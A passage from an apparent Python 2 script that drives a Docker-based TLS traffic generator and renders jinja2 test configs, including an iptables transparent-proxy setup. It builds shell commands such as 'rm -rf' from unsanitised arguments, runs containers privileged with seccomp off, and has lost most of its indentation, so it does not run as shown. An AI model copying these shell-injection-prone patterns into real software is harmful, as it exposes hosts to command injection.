'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '46.2',
'server_ip_prefix' : '136.2'
},
{'cipher_name' : 'DES-CBC3-SHA',
'cipher' : '{DES-CBC3-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '47.2',
'server_ip_prefix' : '137.2'
},
{'cipher_name' : 'SEED-SHA',
'cipher' : '{SEED-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '48.2',
'server_ip_prefix' : '138.2'}
]
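# Illustrative helper (not used by the original script): supported_ciphers is
# keyed implicitly by 'cipher_name', so a small lookup makes the per-cipher
# defaults easy to reach. The function name is hypothetical.
def lookup_cipher_entry(cipher_name):
    for entry in supported_ciphers:
        if entry['cipher_name'] == cipher_name:
            return entry
    return None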
def start_containers(pod_info, c_args):
rundir_map = "--volume={}:{}".format (c_args.host_rundir
, c_args.target_rundir)
srcdir_map = "--volume={}:{}".format (c_args.host_srcdir
, c_args.target_srcdir)
for z_index in range( pod_info['containers']['count'] ):
zone_cname = "{}-zone-{}".format (c_args.pod, z_index+1)
cmd_str = "sudo docker run --cap-add=SYS_PTRACE --security-opt seccomp=unconfined --network=bridge --privileged --name {} -it -d {} {} tlspack/tgen:latest /bin/bash".format (zone_cname, rundir_map, srcdir_map)
os.system (cmd_str)
for network in pod_info['networks']:
host_iface = network['host_iface']
host_macvlan = network['host_macvlan']
cmd_str = "sudo ip link set dev {} up".format(host_iface)
os.system (cmd_str)
cmd_str = "sudo docker network connect {} {}".format(host_macvlan, zone_cname)
os.system (cmd_str)
cmd_str = "sudo docker exec -d {} cp -f /rundir/bin/tlspack.exe /usr/local/bin".format(zone_cname)
os.system (cmd_str)
cmd_str = "sudo docker exec -d {} chmod +x /usr/local/bin/tlspack.exe".format(zone_cname)
os.system (cmd_str)
cmd_str = "sudo docker exec -d {} cp -f /rundir/bin/rpc_proxy_main.py /usr/local/bin".format(zone_cname)
os.system (cmd_str)
cmd_str = "sudo docker exec -d {} chmod +x /usr/local/bin/rpc_proxy_main.py".format(zone_cname)
os.system (cmd_str)
cmd_str = "docker inspect --format='{{.NetworkSettings.IPAddress}}' " + zone_cname
zone_ipaddr = subprocess.check_output(cmd_str, shell=True, close_fds=True).strip()
cmd_str = "sudo docker exec -d {} python3 /usr/local/bin/rpc_proxy_main.py {} {}".format(zone_cname, zone_ipaddr, 8081)
os.system (cmd_str)
def stop_containers(pod_info, c_args):
for z_index in range( pod_info['containers']['count'] ):
zone_cname = "{}-zone-{}".format (c_args.pod, z_index+1)
cmd_str = "sudo docker rm -f {}".format (zone_cname)
os.system (cmd_str)
def restart_containers(pod_info, c_args):
stop_containers(pod_info, c_args)
start_containers(pod_info, c_args)
def add_traffic_params (arg_parser):
arg_parser.add_argument('--sysinit'
, action="store_true"
, default=False
, help = 'sysinit')
arg_parser.add_argument('--host_rundir'
, action="store"
, default='/root/rundir'
, help = 'rundir path')
arg_parser.add_argument('--target_rundir'
, action="store"
, default='/rundir'
, help = 'rundir path in container')
arg_parser.add_argument('--host_srcdir'
, action="store"
, default='/root/tcpdash'
, help = 'host_srcdir')
arg_parser.add_argument('--target_srcdir'
, action="store"
, default='/root/tcpdash'
, help = 'target_srcdir')
arg_parser.add_argument('--pod'
, action="store"
, required=True
, help = 'pod name')
arg_parser.add_argument('--runtag'
, action="store"
, required=True
, help = 'run id')
arg_parser.add_argument('--na'
, action="store"
, required=True
, dest='na_iface'
, help = 'na_iface name')
arg_parser.add_argument('--nb'
, action="store"
, required=True
, dest='nb_iface'
, help = 'nb_iface name')
arg_parser.add_argument('--cps'
, action="store"
, type=int
, required=True
        , help = 'cps : 1 - 10000')
arg_parser.add_argument('--max_pipeline'
, action="store"
, type=int
, default=100
, help = 'max_pipeline : 1 - 10000')
arg_parser.add_argument('--max_active'
, action="store"
, type=int
, default=100
, help = 'max_active : 1 - 2000000')
arg_parser.add_argument('--cipher'
, action="store"
        , help = 'cipher name'
, required=True)
arg_parser.add_argument('--sslv3'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tls1'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tls1_1'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tls1_2'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tls1_3'
, action="store_true"
, default=False
, help = '0/1')
arg_parser.add_argument('--tcpdump'
, action="store"
, help = 'tcpdump options'
, default='-c 1000')
arg_parser.add_argument('--total_conn_count'
, action="store"
, type=int
, default=0
, help = 'total connection counts')
arg_parser.add_argument('--client_mac_seed'
, action="store"
, help = '5 bytes'
, default='02:42:ac:14:00')
arg_parser.add_argument('--server_mac_seed'
, action="store"
, help = '5 bytes'
, default='02:42:ac:15:00')
arg_parser.add_argument('--app_next_write'
, action="store"
, type=int
, default=0
, help = 'app_next_write')
arg_parser.add_argument('--app_cs_data_len'
, action="store"
, type=int
, default=128
, help = 'app_cs_data_len')
arg_parser.add_argument('--app_sc_data_len'
, action="store"
, type=int
, default=128
, help = 'app_sc_data_len')
arg_parser.add_argument('--app_rcv_buff'
, action="store"
, type=int
, default=0
, help = 'app_rcv_buff')
arg_parser.add_argument('--app_snd_buff'
, action="store"
, type=int
, default=0
, help = 'app_snd_buff')
arg_parser.add_argument('--tcp_rcv_buff'
, action="store"
, type=int
, default=0
, help = 'tcp_rcv_buff')
arg_parser.add_argument('--tcp_snd_buff'
, action="store"
, type=int
, default=0
, help = 'tcp_snd_buff')
arg_parser.add_argument('--app_cs_starttls_len'
, action="store"
, type=int
, default=0
, help = 'app_cs_starttls_len')
arg_parser.add_argument('--app_sc_starttls_len'
, action="store"
, type=int
, default=0
, help = 'app_sc_starttls_len')
arg_parser.add_argument('--port_begin'
, action="store"
, type=int
, default=5000
        , help = 'port_begin')
def add_proxy_params (arg_parser):
arg_parser.add_argument('--sysinit'
, action="store_true"
, default=False
, help = 'sysinit')
arg_parser.add_argument('--host_rundir'
, action="store"
, default='/root/rundir'
, help = 'rundir path')
arg_parser.add_argument('--target_rundir'
, action="store"
, default='/rundir'
, help = 'rundir path in container')
arg_parser.add_argument('--host_srcdir'
, action="store"
, default='/root/tcpdash'
, help = 'host_srcdir')
arg_parser.add_argument('--target_srcdir'
, action="store"
, default='/root/tcpdash'
, help = 'target_srcdir')
arg_parser.add_argument('--pod'
, action="store"
, required=True
, help = 'pod name')
arg_parser.add_argument('--runtag'
, action="store"
, required=True
, help = 'run id')
arg_parser.add_argument('--proxy_traffic_vlan'
, action="store"
, type=int
, required=True
, help = '1-4095')
arg_parser.add_argument('--ta'
, action="store"
, required=True
, dest = 'ta_iface'
, help = 'ta host interface')
arg_parser.add_argument('--tb'
, action="store"
, required=True
, dest = 'tb_iface'
, help = 'tb host interface')
arg_parser.add_argument('--ta_macvlan'
, action="store"
, default=''
, help = 'ta host macvlan')
arg_parser.add_argument('--tb_macvlan'
, action="store"
, default=''
, help = 'tb host macvlan')
arg_parser.add_argument('--ta_iface_container'
, action="store"
, help = 'ta interface'
, default='eth1')
arg_parser.add_argument('--tb_iface_container'
, action="store"
, help = 'tb interface'
, default='eth2')
arg_parser.add_argument('--ta_subnet'
, action="store"
, help = 'ta subnet'
, required=True)
arg_parser.add_argument('--tb_subnet'
, action="store"
, help = 'tb subnet'
, required=True)
arg_parser.add_argument('--ta_tcpdump'
, action="store"
, help = 'ta tcpdump'
, default='-c 100')
arg_parser.add_argument('--tb_tcpdump'
, action="store"
, help = 'tb tcpdump'
, default='-c 100')
arg_parser.add_argument('--client_mac_seed'
, action="store"
, help = '5 bytes'
, default='02:42:ac:14:00')
arg_parser.add_argument('--server_mac_seed'
, action="store"
, help = '5 bytes'
, default='02:42:ac:15:00')
def add_stop_params (arg_parser):
arg_parser.add_argument('--host_rundir'
, action="store"
, default='/root/rundir'
, help = 'rundir path')
arg_parser.add_argument('--runtag'
, action="store"
, required=True
, help = 'run id')
arg_parser.add_argument('--force'
, action="store_true"
, default=False
, help = '0/1')
def zone_start_thread(pod_info, c_args, z_index):
zone_cname = "{}-zone-{}".format (c_args.pod, z_index+1)
cmd_str = "docker inspect --format='{{.NetworkSettings.IPAddress}}' " + zone_cname
zone_ipaddr = subprocess.check_output(cmd_str, shell=True, close_fds=True).strip()
cfg_file = os.path.join(c_args.target_rundir, 'traffic', c_args.runtag, 'config.json')
requests.post('http://{}:8081/start'.format(zone_ipaddr)
        , data = json.dumps({'cfg_file' : cfg_file
, 'z_index' : z_index
, 'net_ifaces' : map (lambda n : n['container_iface'], pod_info['networks']) })
, headers={'Content-type': 'application/json', 'Accept': 'text/plain'})
def start_run(c_args, traffic_s):
registry_dir = os.path.join(c_args.host_rundir, 'registry')
registry_dir_pod = os.path.join(registry_dir, 'pods', c_args.pod)
registry_file_pod = os.path.join(registry_dir_pod, 'config.json')
registry_dir_run = os.path.join(registry_dir, 'runs', c_args.runtag)
registry_file_run = os.path.join(registry_dir_run, 'config.json')
if os.path.exists(registry_file_run):
with open (registry_file_run) as f:
registry_run_info = json.load(f)
print 'error: {} already running in pod {}'.format (c_args.runtag, registry_run_info['pod'])
sys.exit(1)
with open(registry_file_pod) as f:
pod_info = json.load(f)
if pod_info.get('runing'):
print 'error: {} pod in use running {}'.format(c_args.pod, pod_info['runing'])
sys.exit(1)
# create config dir; file
try:
cfg_j = json.loads (traffic_s)
traffic_s = json.dumps(cfg_j, indent=4)
except:
print traffic_s
sys.exit(1)
cfg_dir = os.path.join(c_args.host_rundir, 'traffic', c_args.runtag)
cfg_file = os.path.join(cfg_dir, 'config.json')
os.system ( 'rm -rf {}'.format(cfg_dir) )
os.system ( 'mkdir -p {}'.format(cfg_dir) )
os.system ( 'mkdir -p {}'.format(os.path.join(cfg_dir, 'pcaps')) )
os.system ( 'mkdir -p {}'.format(os.path.join(cfg_dir, 'stats')) )
os.system ( 'mkdir -p {}'.format(os.path.join(cfg_dir, 'logs')) )
with open(cfg_file, 'w') as f:
f.write(traffic_s)
if c_args.sysinit or not pod_info.get('ready', 0):
restart_containers (pod_info, c_args)
pod_info['ready'] = 1
time.sleep (5)
pod_info['runing'] = c_args.runtag
# create registry entries
os.system ('mkdir -p {}'.format(registry_dir_run))
with open(registry_file_run, 'w') as f:
json.dump({'pod' : c_args.pod}, f)
with open(registry_file_pod, 'w') as f:
json.dump(pod_info, f)
for next_step in range(1, 3):
z_threads = []
z_index = -1
for zone in cfg_j['zones']:
z_index += 1
if not zone['enable']:
continue
if zone.get('step', 1) == next_step:
thd = Thread(target=zone_start_thread, args=[pod_info, c_args, z_index])
thd.daemon = True
thd.start()
z_threads.append(thd)
if z_threads:
for thd in z_threads:
thd.join()
time.sleep(1)
def zone_stop_thread(pod_info, c_args, z_index):
zone_cname = "{}-zone-{}".format (c_args.pod, z_index+1)
cmd_str = "docker inspect --format='{{.NetworkSettings.IPAddress}}' " + zone_cname
zone_ipaddr = subprocess.check_output(cmd_str, shell=True, close_fds=True).strip()
requests.post('http://{}:8081/stop'.format(zone_ipaddr)
, data = json.dumps({'net_ifaces' : ['eth1', 'eth2' ] })
, headers={'Content-type': 'application/json', 'Accept': 'text/plain'})
def stop_run(pod_info, c_args):
registry_dir = os.path.join(c_args.host_rundir, 'registry')
registry_dir_pod = os.path.join(registry_dir, 'pods', c_args.pod)
registry_file_pod = os.path.join(registry_dir_pod, 'config.json')
registry_dir_run = os.path.join(registry_dir, 'runs', c_args.runtag)
registry_file_run = os.path.join(registry_dir_run, 'config.json')
if c_args.force:
stop_containers (pod_info, c_args)
pod_info['ready'] = 0
pod_info['runing'] = ''
with open(registry_file_pod, 'w') as f:
json.dump(pod_info, f)
os.system ( 'rm -rf {}'.format(registry_dir_run) )
sys.exit(1)
    # check whether a test is actually running before tearing anything down
if not os.path.exists(registry_dir_run):
print 'test {} not running'.format(pod_info['runing'])
sys.exit(1)
if not pod_info.get('runing'):
print 'no test running on pod {}'.format (c_args.pod)
sys.exit(1)
cfg_dir = os.path.join(c_args.host_rundir, 'traffic', pod_info['runing'])
cfg_file = os.path.join(cfg_dir, 'config.json')
try:
with open(cfg_file) as f:
cfg_j = json.load(f)
except:
print 'invalid config file'
sys.exit(1)
z_threads = []
z_index = -1
for zone in cfg_j['zones']:
z_index += 1
if not zone['enable']:
continue
thd = Thread(target=zone_stop_thread, args=[pod_info, c_args, z_index])
thd.daemon = True
thd.start()
z_threads.append(thd)
for thd in z_threads:
thd.join()
os.system ("rm -rf {}".format (registry_dir_run))
pod_info['ready'] = 1
pod_info['runing'] = ''
with open(registry_file_pod, 'w') as f:
json.dump(pod_info, f)
def add_cps_params (cmd_parser):
cmd_parser.add_argument('--ecdsa_cert'
, action="store_true"
, default=False
, help = '0/1')
def process_cps_template (c_args):
tlspack_cfg = jinja2.Template('''
{
"tgen_app" : "cps",
"zones" : [
{% set ns = namespace(cs_grp_count=0, srv_count=0) %}
{%- for traffic_id in range(1, PARAMS.traffic_paths+1) %}
{
"zone_label" : "zone-{{traffic_id}}-client",
"enable" : 1,
"step" : 2,
"app_list" : [
{
"app_type" : "tls_client",
"app_label" : "tls_client_1",
"enable" : 1,
"conn_per_sec" : {{PARAMS.cps}},
"max_pending_conn_count" : {{PARAMS.max_pipeline}},
"max_active_conn_count" : {{PARAMS.max_active}},
"total_conn_count" : {{PARAMS.total_conn_count}},
"cs_grp_list" : [
{% set ns.cs_grp_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.cs_grp_count }}
{% set ns.cs_grp_count = ns.cs_grp_count+1 %}
{
"cs_grp_label" : "cs_grp_{{loop.index}}",
"enable" : 1,
"srv_ip" : "14.2{{traffic_id}}.51.{{loop.index}}",
"srv_port" : 443,
"clnt_ip_begin" : "12.2{{traffic_id}}.51.{{1+loop.index0*10}}",
"clnt_ip_end" : "12.2{{traffic_id}}.51.{{loop.index*10}}",
"clnt_port_begin" : {{PARAMS.port_begin}},
"clnt_port_end" : 65000,
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "fin",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : {{PARAMS.app_cs_starttls_len}},
"sc_start_tls_len" : {{PARAMS.app_sc_starttls_len}}
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.na_iface_container}} up",
"ifconfig {{PARAMS.na_iface_container}} hw ether {{PARAMS.client_mac_seed}}:{{'{:02x}'.format(traffic_id)}}",
"ip route add default dev {{PARAMS.na_iface_container}} table 200",
"ip -4 route add local 12.2{{traffic_id}}.51.0/24 dev lo",
"ip rule add from 12.2{{traffic_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.na_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.pcaps_dir_container.rstrip('/')}}/zone-{{traffic_id}}-client.pcap &"
]
}
,
{
"zone_label" : "zone-{{traffic_id}}-server",
"enable" : 1,
"step" : 1,
"app_list" : [
{
"app_type" : "tls_server",
"app_label" : "tls_server_1",
"enable" : 1,
"srv_list" : [
{% set ns.srv_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.srv_count }}
{% set ns.srv_count = ns.srv_count+1 %}
{
"srv_label" : "srv_{{loop.index}}",
"enable" : 1,
"emulation_id" : 0,
"begin_cert_index" : {{traffic_id*2000}},
"end_cert_index" : 100000,
"srv_ip" : "14.2{{traffic_id}}.51.{{loop.index}}",
"srv_port" : 443,
"srv_cert" : "{{PARAMS.server_cert}}",
"srv_key" : "{{PARAMS.server_key}}",
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "fin",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : {{PARAMS.app_cs_starttls_len}},
"sc_start_tls_len" : {{PARAMS.app_sc_starttls_len}}
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.nb_iface_container}} up",
"ifconfig {{PARAMS.nb_iface_container}} hw ether {{PARAMS.server_mac_seed}}:{{'{:02x}'.format(traffic_id)}}",
"ip route add default dev {{PARAMS.nb_iface_container}} table 200",
"ip -4 route add local 14.2{{traffic_id}}.51.0/24 dev lo",
"ip rule add from 14.2{{traffic_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.nb_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.pcaps_dir_container.rstrip('/')}}/zone-{{traffic_id}}-server.pcap &"
]
}
{{ "," if not loop.last }}
{%- endfor %}
]
}
''')
if c_args.ecdsa_cert:
c_args.server_cert = '/rundir/certs/server2.cert'
c_args.server_key = '/rundir/certs/server2.key'
else:
c_args.server_cert = '/rundir/certs/server.cert'
c_args.server_key = '/rundir/certs/server.key'
return tlspack_cfg.render(PARAMS = c_args)
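# Minimal, self-contained sketch (never called by this script) of the jinja2
# namespace() counter used in the templates above: a "," is emitted only
# between entries that survive the tls-version filter, so the rendered JSON
# stays valid. The names in this sketch are hypothetical.
def _demo_comma_separation():
    import jinja2
    demo = jinja2.Template('''[
{% set ns = namespace(count=0) %}
{%- for item in items %}
{%- if item.enabled %}
{{ "," if ns.count }}
{% set ns.count = ns.count + 1 %}
"{{ item.name }}"
{%- endif %}
{%- endfor %}
]''')
    return demo.render(items=[{'name': 'a', 'enabled': True},
                              {'name': 'b', 'enabled': False},
                              {'name': 'c', 'enabled': True}])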
def add_bw_params (cmd_parser):
cmd_parser.add_argument('--ecdsa_cert'
, action="store_true"
, default=False
, help = '0/1')
def process_bw_template (c_args):
tlspack_cfg = jinja2.Template('''
{
"tgen_app" : "bw",
"zones" : [
{% set ns = namespace(cs_grp_count=0, srv_count=0) %}
{%- for traffic_id in range(1, PARAMS.traffic_paths+1) %}
{
"zone_label" : "zone-{{traffic_id}}-client",
"enable" : 1,
"app_list" : [
{
"app_type" : "tls_client",
"app_label" : "tls_client_1",
"enable" : 1,
"conn_per_sec" : {{PARAMS.cps}},
"max_pending_conn_count" : {{PARAMS.max_pipeline}},
"max_active_conn_count" : {{PARAMS.max_active}},
"total_conn_count" : {{PARAMS.total_conn_count}},
"cs_grp_list" : [
{% set ns.cs_grp_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.cs_grp_count }}
{% set ns.cs_grp_count = ns.cs_grp_count+1 %}
{
"cs_grp_label" : "cs_grp_{{loop.index}}",
"enable" : 1,
"srv_ip" : "24.2{{traffic_id}}.51.{{loop.index}}",
"srv_port" : 443,
"clnt_ip_begin" : "22.2{{traffic_id}}.51.{{1+loop.index0*10}}",
"clnt_ip_end" : "22.2{{traffic_id}}.51.{{loop.index*10}}",
"clnt_port_begin" : {{PARAMS.port_begin}},
"clnt_port_end" : 65000,
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "reset",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : {{PARAMS.app_cs_starttls_len}},
"sc_start_tls_len" : {{PARAMS.app_sc_starttls_len}}
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.na_iface_container}} up",
"ifconfig {{PARAMS.na_iface_container}} hw ether {{PARAMS.client_mac_seed}}:{{'{:02x}'.format(traffic_id)}}",
"ip route add default dev {{PARAMS.na_iface_container}} table 200",
"ip -4 route add local 22.2{{traffic_id}}.51.0/24 dev lo",
"ip rule add from 22.2{{traffic_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.na_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.pcaps_dir_container.rstrip('/')}}/zone-{{traffic_id}}-client.pcap &"
]
}
,
{
"zone_label" : "zone-{{traffic_id}}-server",
"enable" : 1,
"app_list" : [
{
"app_type" : "tls_server",
"app_label" : "tls_server_1",
"enable" : 1,
"srv_list" : [
{% set ns.srv_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.srv_count }}
{% set ns.srv_count = ns.srv_count+1 %}
{
"srv_label" : "srv_{{loop.index}}",
"enable" : 1,
"srv_ip" : "24.2{{traffic_id}}.51.{{loop.index}}",
"srv_port" : 443,
"srv_cert" : "{{PARAMS.server_cert}}",
"srv_key" : "{{PARAMS.server_key}}",
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "reset",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : {{PARAMS.app_cs_starttls_len}},
"sc_start_tls_len" : {{PARAMS.app_sc_starttls_len}}
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.nb_iface_container}} up",
"ifconfig {{PARAMS.nb_iface_container}} hw ether {{PARAMS.server_mac_seed}}:{{'{:02x}'.format(traffic_id)}}",
"ip route add default dev {{PARAMS.nb_iface_container}} table 200",
"ip -4 route add local 24.2{{traffic_id}}.51.0/24 dev lo",
"ip rule add from 24.2{{traffic_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.nb_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.pcaps_dir_container.rstrip('/')}}/zone-{{traffic_id}}-server.pcap &"
]
}
{{ "," if not loop.last }}
{%- endfor %}
]
}
''')
if c_args.ecdsa_cert:
c_args.server_cert = '/rundir/certs/server2.cert'
c_args.server_key = '/rundir/certs/server2.key'
else:
c_args.server_cert = '/rundir/certs/server.cert'
c_args.server_key = '/rundir/certs/server.key'
return tlspack_cfg.render(PARAMS = c_args)
def add_tproxy_params (cmd_parser):
pass
def process_tproxy_template (c_args):
tlspack_cfg = jinja2.Template ('''{
"tgen_app" : "tproxy",
"zones" : [
{
"zone_label" : "zone-1-proxy",
"enable" : 1,
"app_list" : [
{
"app_type" : "tcp_proxy",
"app_label" : "tcp_proxy_1",
"enable" : 1,
"proxy_list" : [
{
"proxy_label" : "bae-issue",
"enable" : 1,
"proxy_ip" : "0.0.0.0",
"proxy_port" : 883,
"proxy_type_id" : 1,
"tcp_rcv_buff" : 0,
"tcp_snd_buff" : 0
}
]
}
],
"host_cmds" : [
"sudo ip link set dev {{PARAMS.ta_iface}} up",
"sudo ip link set dev {{PARAMS.tb_iface}} up",
"sudo docker network connect {{PARAMS.ta_macvlan}} {{PARAMS.runtag}}-zone-1-proxy",
"sudo docker network connect {{PARAMS.tb_macvlan}} {{PARAMS.runtag}}-zone-1-proxy"
],
"zone_cmds" : [
"sysctl net.ipv4.conf.all.rp_filter=0",
"sysctl net.ipv4.conf.default.rp_filter=0",
"ip link set dev {{PARAMS.ta_iface_container}} up",
"ifconfig {{PARAMS.ta_iface_container}} hw ether 00:50:56:8c:5a:54",
"sysctl net.ipv4.conf.{{PARAMS.ta_iface_container}}.rp_filter=0",
"ip link add link {{PARAMS.ta_iface_container}} name {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}} type vlan id {{PARAMS.proxy_traffic_vlan}}",
"ip link set dev {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}} up",
"ip addr add 1.1.1.1/24 dev {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}}",
"arp -i {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}} -s 1.1.1.254 00:50:56:8c:86:c3",
"ip route add {{PARAMS.ta_subnet}} via 1.1.1.254 dev {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}}",
"ip link set dev {{PARAMS.tb_iface_container}} up",
"ifconfig {{PARAMS.tb_iface_container}} hw ether 00:50:56:8c:86:c3",
"sysctl net.ipv4.conf.{{PARAMS.tb_iface_container}}.rp_filter=0",
"ip link add link {{PARAMS.tb_iface_container}} name {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}} type vlan id {{PARAMS.proxy_traffic_vlan}}",
"ip link set dev {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}} up",
"ip addr add 2.2.2.1/24 dev {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}}",
"arp -i {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}} -s 2.2.2.254 00:50:56:8c:5a:54",
"ip route add {{PARAMS.tb_subnet}} via 2.2.2.254 dev {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}}",
"iptables -t mangle -N DIVERT",
"iptables -t mangle -A PREROUTING -p tcp -m socket -j DIVERT",
"iptables -t mangle -A DIVERT -j MARK --set-mark 1",
"iptables -t mangle -A DIVERT -j ACCEPT",
"ip rule add fwmark 1 lookup 100",
"ip route add local 0.0.0.0/0 dev lo table 100",
"iptables -t mangle -A PREROUTING -i {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}} -p tcp --dport 443 -j TPROXY --tproxy-mark 0x1/0x1 --on-port 883",
"iptables -t mangle -A PREROUTING -i {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}} -p tcp --dport 443 -j TPROXY --tproxy-mark 0x1/0x1 --on-port 883",
"tcpdump -i {{PARAMS.ta_iface_container}} {{PARAMS.ta_tcpdump}} -w {{PARAMS.pcaps_dir_container.rstrip('/')}}/zone-1-proxy-ta.pcap &",
"tcpdump -i {{PARAMS.tb_iface_container}} {{PARAMS.tb_tcpdump}} -w {{PARAMS.pcaps_dir_container.rstrip('/')}}/zone-1-proxy-tb.pcap &"
]
}
]
}
''')
return tlspack_cfg.render(PARAMS = c_args)
def add_mcert_params (cmd_parser):
pass
def process_mcert_template (c_args):
tlspack_cfg = jinja2.Template('''
{
"tgen_app" : "mcert",
"zones" : [
{% set ns = namespace(cs_grp_count=0, srv_count=0) %}
{%- for traffic_id in range(1, PARAMS.traffic_paths+1) %}
{
"zone_label" : "zone-{{traffic_id}}-client",
"enable" : 1,
"app_list" : [
{
"app_type" : "tls_client",
"app_label" : "tls_client_1",
"enable" : 1,
"conn_per_sec" : {{PARAMS.cps}},
"max_pending_conn_count" : {{PARAMS.max_pipeline}},
"max_active_conn_count" : {{PARAMS.max_active}},
"total_conn_count" : {{PARAMS.total_conn_count}},
"cs_grp_list" : [
{% set ns.cs_grp_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
